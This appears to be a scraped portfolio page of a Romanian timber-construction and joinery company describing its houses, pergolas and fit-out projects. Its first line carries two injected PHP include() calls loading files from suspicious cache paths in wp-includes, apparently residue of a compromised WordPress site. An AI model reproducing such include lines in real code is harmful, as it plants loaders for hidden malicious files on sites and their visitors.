include('./wp-includes/js/cache/wp-cache.php'); include('./wp-includes/Text/Diff/Renderer/cache/feed-cron.php'); Portofoliu : HD Stil

Complex balnear din lemn

Complexul este format din 8 dormitoare pentru 16 persoane, 4 sali de servit masa, 4 bai.

 

Lacustre. Locuinte pe stalpi la marginea sau in mijlocul lacurilor.

Executata din lemn lacustra ofera o vedere impresionanta prin amplasarea sa pe apa

 

Ferme de cai pe structura metalica

Executatie si montaj rapide si eficiente prin sistemul de structura metalica usor de asamblat si de intretinut

 

Pensiune din lemn Mesteacanul, consultanta, proiectare, design, executie la cheie

Proiectam, executam, amenajam pensiuni la cheie. De la constructie, la mobilier si accesorii va propunem o solutie completa pentru pensiunea dvs.

 

Ferestre din lemn triplu stratificat, obloane din lemn de brad

Pod din lemn

 

 

Casa de vacanta la cheie F1

Executata din lemn de castan, Casa de vacanta F1 indeplineste toate nevoile unui concediu linistit. Special conceputa pentru o familie mare, ea este dotata cu doua dormitoare, living, bucatarie si se bucura de o terasa generoasa.

Casa de vacanta pe piloni la cheie F4

Executata din lemn de castan, Casa pe patru piloni F4 este special conceputa pentru zone cu o priveliste naturala deosebita. Cu un design aparte ea este ridicata de la sol cu aproximativ 2 metri. Casuta se poate vizita la cerere.

Casa de vacanta pe structura – la cheie F5

Executata din lemn de castan, Casa pe structura din lemn prezinta interes pentru persoanele doritoare de vacanta. Casa beneficiaza de o inaltare de aproximativ 2 metri de la sol.

Tamplarie interioara si exterioara

Amplasare: Bucuresti

Tamplarie interioara si exterioara din lemn triplu stratitificat

Amplasare: Episcopia Deva Romania

Amenajare exterioara- Pergola din lemn masiv de stejar

Amplasare: Corica, Franta

Pergola este executata din lemn de stejar, este tratata ecologic cu vopsele pe baza de apa si rezistente la UV, pentru a mari timpul de viata.
Aceasta pergola are ca scop crearea unei ambiante placute si conturarea prin amplasamentul intrarii in locuinta, si totodata pt a imbunatati aspectul arhitectural al locuintei dvs.

 

Constructii Mansarde cu structura din lemn pentru case

Amplasare: Alba Iulia, Romania

O solutie eficienta pentru marirea spatiului de locuit al casei este construirea unei mansarde cu structura din lemn. Structurile din lemn prezinta garantia unui lemn bine uscat in medii controlate, ignifugare prin imersie, vopsire cu vopsele pe baza de apa rezistente la UV, imbinari sigure. Aceste structuri permit realizarea unei mansarde cu diverse arhitecturi ce pot schimba aspectul casei dvs. Ca si constructiile din lemn, mansardele sunt personalizate in functie de arhitectura dorita dar si in functie de structura construita peste care se monteaza mansarda. Structurile din lemn pt mansarde sunt produse proiectate si realizate de compania noastra.

 

Casa vacanta

Amplasare: Corsica, Franta

Daca aveti nevoie de o casa din lemn, mobilier de gradina, tamplarie din lemn, usi de interior si exterior din lemn,ati ajuns unde trebuie.Societatea noastra produce pentru tine case din lemn masiv din diverse esente pentru vacanta dar si pentru locuit.

DE CE LEMN?

Confortul pe care il reprezinta lemnul, dorinta de a ridica standardul calitatii vietii reprezinta o preocupare importanta pentru cei care doresc un trai bun si sanatos.

Lemnul este unicul material de constructii, natural care “respira”, absoarbe si emana umiditate, regularizand astfel mediul ambiental interior, stabilizand umiditatea, filtrand si purificand aerul. Casele din lemn sunt si recunoscute ca avand un sistem propriu de aer conditionat, pur, natural.

Amenajare, Tamplarie interioara si exterioara din lemn de stejar

Casa Privata

Amplasare: Alba Iulia

Compania noastra pune la dispozitia dvs produse de mobilier din lemn masiv pt amenajarea casei dvs – mobilier de bar,mobilier de living, mobilier de copii, cat si tamplarie din lemn triplu stratificat, usi de exterior si interior din lemn.

La un excelent raport calitate-pret puteti beneficia acum de serviciile noastre in amenajare la standarde europene. Optati acum pentru o solutie inteligenta de amenajare cu mobilier din lemn masiv, cat si tamplarie din lemn triplu stratificat, usi de exterior si interior din lemn, pentru a va satisface dorintele dvs in directia calitati produselor noastre. In urma vizionarii ofertei noastre si in speranta unei bune colaborari asteptam sa ne contactati pentr a va putea face o oferta de amenajare a casei dvs conforma cu dorintele dvs.

Va multumim,

 

Tamplarie, trepte, interioare si placarea profesionala cu lemn

Amplasare: Calanul Mic – Judetul Hunedoara

Casa privata

Tamplarie si placarea profesionala cu lemn din diferite esente-molid,larice, stejar etc.

Lemnul este un element arhitectural fara varsta care poate fi adaptat cu usurinta oricarui stil de arhitectura. Este alegerea ideala pt schimbarea,imbunatatirea unui perete de casa cu un design clasic. De asemenea compania noastra asigura si tamplaria exterioara din lemn triplu stratificat,usi de exterior,usi de interior din lemn.

Finisajele folosite la placarea cu lemn a casei, cat si la tamplaria din lemn sunt ecologice caracterizandu-se la o inalta valoare de difuzie cu alte cuvinte casa “respira” asigurand un habitat sanatos.

Pentru ca siguranta si dorintele clientilor nostri sunt cele mai importante,compania noastra executa la cererea celor care apeleaza la seviciile oferite de noi, procedee de placare cu lemn, menite sa asigure o mai buna calitate si estetica a casei dvs.

 

Restaurant Domnesti

Amplasare Bucuresti – Cartierul de vile Curtea Domneasca

Frumusetea si stilul acestui local construit de curand, “Casa Domnesti” va ofera o combinatie perfecta intre modern si clasic, intr-o atmosfera calda in care se regaseste finetea detaliului din construit.

www.casadomnesti.ro

 

Cartierul Curtea Domneasca

Amplasare Bucuresti

Investitie majora s-a efectuat in Ansamblul Rezidential Curtea Domneasca – Domnesti, in care compania noastra a efectuat intreaga tamplarie exterioara si interioara din lemn triplu stratificat cu geam termopan. De asemenea elementele de garduri au fost realizate din lemn pentru a oferi o eleganta demna de acest cartier.

www.curteadomneasca.ro

 

Tamplarie interioara Hotel Novera

Amplasare Timisoara – langa Novatim complex

La capatul calatoriei dumneavoastra spre Timisoara va asteapta Hotel Novera, destinatia de 4 stele. Aici puteti regasi usile din lemn marca HDSTIL.

www.hotelnovera.ro

 

Mall Alba

Amplasare Alba Iulia

Dezvoltat pe un concept arhitectural modern, complex, cu finisaje din lemn,inox si sticla, compania noastra a realizat imprejmuirea intregului etaj al mallului cu elemente de sticla si plinderi din metal, mana curenta din lemn masiv, la parter s-au realizat imprejmuirea cadrului natural cu balustrada din inox si treptele care urca spre cafenea pentru a incheia cu amenajarea barului din lemn si sticla, precum si mesele de asemenea realizate din lemn masiv. Ca si elemente decorative am realizat ghivece din lemn in care se regasesc plante inalte.

www.mallalba.ro

 

Bijuteria Milano Gold

Amplasare Promenada Mall Judetul Sibiu

O amenajare de lux, care a necesitat un proiect amplu de design este amenajarea Bijuteriei Milano Gold. Patronul bijuteriei a lasat cale libera designului in care primeaza calitatea si materialele scumpe, finisajele încadrate în ultimele tendinte, obiectele decorative originale si pline de personalitate care întregesc decorul si finetea detaliilor, cuantificarea costurilor, fiind ultima problema de rezolvat.

 

Bijuteria Milano Gold

Amplasare  Ulpia Mall Deva – Judetul Hunedoara